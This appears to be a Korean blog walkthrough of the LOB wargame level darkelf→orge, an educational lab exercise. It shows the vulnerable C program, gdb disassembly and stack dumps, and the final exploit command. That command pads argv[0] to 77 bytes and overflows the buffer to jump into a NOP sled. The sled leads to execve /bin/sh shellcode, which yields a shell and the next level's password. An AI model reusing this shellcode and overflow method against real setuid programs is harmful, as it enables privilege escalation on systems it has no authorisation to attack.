darkelf / kernel crashed 로 접속
bash2
orge.c
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
저번 문제와 같은 조건에
이 부분이 추가되었다.
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
argv[0]은 ./orge부분일텐데 어떻게 77바이트를 맞추는지 모르겠어서 찾아보았다.
심볼릭 링크를 사용하거나 혹은 /를 추가로 사용한다.(/은 많이 와도 상관이 없다고 한다.)
다음과 같은 방법을 사용했다. 테스트했는데 argv[0] error가 나지않았다.
[darkelf@localhost darkelf]$ `python -c 'print "./"+"/"*71+"orge"'` hello
stack is still your friend.
gdb를 orge2로 실행시켰다가 argv[0] 길이를 어떻게 맞춰야할지 모르겠어서 이름을 A*77로 바꾸고 다시 실행시켜주었다.
[darkelf@localhost darkelf]$ rename orge2 `python -c 'print "A"*77'` orge2
[darkelf@localhost darkelf]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
orge
orge.c
[darkelf@localhost darkelf]$ gdb -q `python -c 'print "A"*77'`
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
...
0x80485dd <main+221>: mov %edx,DWORD PTR [%eax]
0x80485df <main+223>: push %edx
0x80485e0 <main+224>: call 0x80483f0 <strlen>
0x80485e5 <main+229>: add %esp,4
0x80485e8 <main+232>: mov %eax,%eax
0x80485ea <main+234>: cmp %eax,48
0x80485ed <main+237>: jbe 0x8048606 <main+262>
0x80485ef <main+239>: push 0x80486c8
0x80485f4 <main+244>: call 0x8048410 <printf>
0x80485f9 <main+249>: add %esp,4
0x80485fc <main+252>: push 0
0x80485fe <main+254>: call 0x8048420 <exit>
0x8048603 <main+259>: add %esp,4
0x8048606 <main+262>: mov %eax,DWORD PTR [%ebp+12]
0x8048609 <main+265>: add %eax,4
0x804860c <main+268>: mov %edx,DWORD PTR [%eax]
0x804860e <main+270>: push %edx
0x804860f <main+271>: lea %eax,[%ebp-40]
0x8048612 <main+274>: push %eax
0x8048613 <main+275>: call 0x8048440 <strcpy>
0x8048618 <main+280>: add %esp,8
0x804861b <main+283>: lea %eax,[%ebp-40]
0x804861e <main+286>: push %eax
---Type <return> to continue, or q <return> to quit---
0x804861f <main+287>: push 0x80486df
0x8048624 <main+292>: call 0x8048410 <printf>
0x8048629 <main+297>: add %esp,8
0x804862c <main+300>: push 40
0x804862e <main+302>: push 0
0x8048630 <main+304>: lea %eax,[%ebp-40]
0x8048633 <main+307>: push %eax
0x8048634 <main+308>: call 0x8048430 <memset>
0x8048639 <main+313>: add %esp,12
0x804863c <main+316>: leave
0x804863d <main+317>: ret
0x804863e <main+318>: nop
0x804863f <main+319>: nop
End of assembler dump.
main+280에 bp를 걸겠다.
실행하려다가 이름을 잘못 바꿨다는 걸 깨달았다. 실행될 때 /home/darkelf/이름 으로 실행되니 13바이트를 뺀 A로 다시 저장했다. gdb를 다시 실행하고 조건에 맞게 실행시켰다.
(gdb) r `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`
Starting program: /home/darkelf/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`
Breakpoint 1, 0x8048618 in main ()
(gdb) x/200x $esp
0xbffff9d4: 0xbffff9e0 0xbffffba1 0x00000015 0xbfbfbfbf
0xbffff9e4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffff9f4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffa04: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0x00000000
0xbffffa14: 0xbffffa54 0xbffffa64 0x40013868 0x00000003
0xbffffa24: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffa34: 0x00000003 0xbffffa54 0x08048390 0x0804866c
0xbffffa44: 0x4000ae60 0xbffffa4c 0x40013e90 0x00000003
0xbffffa54: 0xbffffb53 0xbffffba1 0xbffffbd2 0x00000000
0xbffffa64: 0xbffffc37 0xbffffc59 0xbffffc63 0xbffffc71
0xbffffa74: 0xbffffc90 0xbffffca0 0xbffffcb9 0xbffffcd6
0xbffffa84: 0xbffffcf5 0xbffffd00 0xbffffd0e 0xbffffd51
0xbffffa94: 0xbffffd64 0xbffffd79 0xbffffd89 0xbffffd96
0xbffffaa4: 0xbffffdb5 0xbffffdc0 0xbffffdd1 0xbffffde3
0xbffffab4: 0xbffffdeb 0x00000000 0x00000003 0x08048034
0xbffffac4: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffad4: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffae4: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffaf4: 0x0000000b 0x000001fa 0x0000000c 0x000001fa
0xbffffb04: 0x0000000d 0x000001fa 0x0000000e 0x000001fa
0xbffffb14: 0x00000010 0x0f8bfbff 0x0000000f 0xbffffb4e
0xbffffb24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb34: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffb44: 0x00000000 0x00000000 0x36690000 0x2f003638
0xbffffb54: 0x656d6f68 0x7261642f 0x666c656b 0x4141412f
0xbffffb64: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb74: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb84: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb94: 0x41414141 0x41414141 0x41414141 0xbfbfbf00
0xbffffba4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffbb4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffbc4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0x424200bf
0xbffffbd4: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffbe4: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffbf4: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc04: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc14: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc24: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc34: 0x00004242 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x00000000 0x00000000 0x00000000 0x00000000
...
0xbffffc04의 주소로 넣겠다.
`python -c 'print "."+"/"*72+"orge"'` `python -c 'print "A"*44+"\x04\xfc\xff\xbf "+"\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
계속되는 실패로 인해 그냥 심볼릭 링크를 만들기로 했다.
ln -s orge `python -c 'print "A"*75'`
다시 조건에 맞춰서 argv[2]에 nop와 쉘코드를 넣었다.
`python -c 'print "./"+"B"*75'` `python -c 'print "A"*47+"\xbf "+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
Segmentation fault (core dumped)
core 분석
[darkelf@localhost darkelf]$ gdb -c core -q
Core was generated by `./BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB A'.
Program terminated with signal 11, Segmentation fault.
#0 0xbf414141 in ?? ()
(gdb) x/200x $esp
0xbffff630: 0x00000000 0xbffff674 0xbffff684 0x40013868
0xbffff640: 0x00000003 0x08048450 0x00000000 0x08048471
0xbffff650: 0x08048500 0x00000003 0xbffff674 0x08048390
0xbffff660: 0x0804866c 0x4000ae60 0xbffff66c 0x40013e90
0xbffff670: 0x00000003 0xbffff766 0xbffff7b4 0xbffff7e5
0xbffff680: 0x00000000 0xbffffbe7 0xbffffbf9 0xbffffc12
0xbffff690: 0xbffffc31 0xbffffc53 0xbffffc60 0xbffffe23
0xbffff6a0: 0xbffffe42 0xbffffe5f 0xbffffe74 0xbffffe93
0xbffff6b0: 0xbffffe9e 0xbffffeae 0xbffffeb6 0xbffffec0
0xbffff6c0: 0xbffffed0 0xbffffede 0xbffffeec 0xbffffefd
0xbffff6d0: 0xbfffff08 0xbfffff1b 0xbfffff5e 0x00000000
0xbffff6e0: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffff6f0: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffff700: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffff710: 0x00000009 0x08048450 0x0000000b 0x000001fa
0xbffff720: 0x0000000c 0x000001fa 0x0000000d 0x000001fa
0xbffff730: 0x0000000e 0x000001fa 0x00000010 0x0f8bfbff
0xbffff740: 0x0000000f 0xbffff761 0x00000000 0x00000000
0xbffff750: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff760: 0x38366900 0x2f2e0036 0x42424242 0x42424242
0xbffff770: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff780: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff790: 0x42424242 0x42424242 0x42424242 0x42424242
---Type <return> to continue, or q <return> to quit---
0xbffff7a0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffff7b0: 0x00424242 0x41414141 0x41414141 0x41414141
0xbffff7c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff7e0: 0xbf414141 0x90909000 0x90909090 0x90909090
0xbffff7f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff800: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff810: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff820: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff830: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff840: 0x90909090 0x90909090 0x90909090 0x90909090
...
nop가 들어있는 주소 중 하나인 0xbffff830을 넣어보겠다.
dummy(44) + nop 주소 + nop(1000) + shellcode
[darkelf@localhost darkelf]$ `python -c 'print "./"+"A"*75'` `python -c 'print "A"*44+"\x30\xf8\xff\xbf "+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0??
bash$ my-pass
euid = 507
timewalker
드디어 공격에 성공했다!!!
timewalker
'시스템 해킹 > LOB' 카테고리의 다른 글
[LOB] troll → vampire (0) | 2021.02.27 |
---|---|
[LOB] orge → troll (0) | 2021.02.24 |
[LOB] wolfman → darkelf (0) | 2021.02.22 |
[LOB] orc → wolfman (0) | 2021.02.21 |
[LOB] goblin → orc (0) | 2021.02.21 |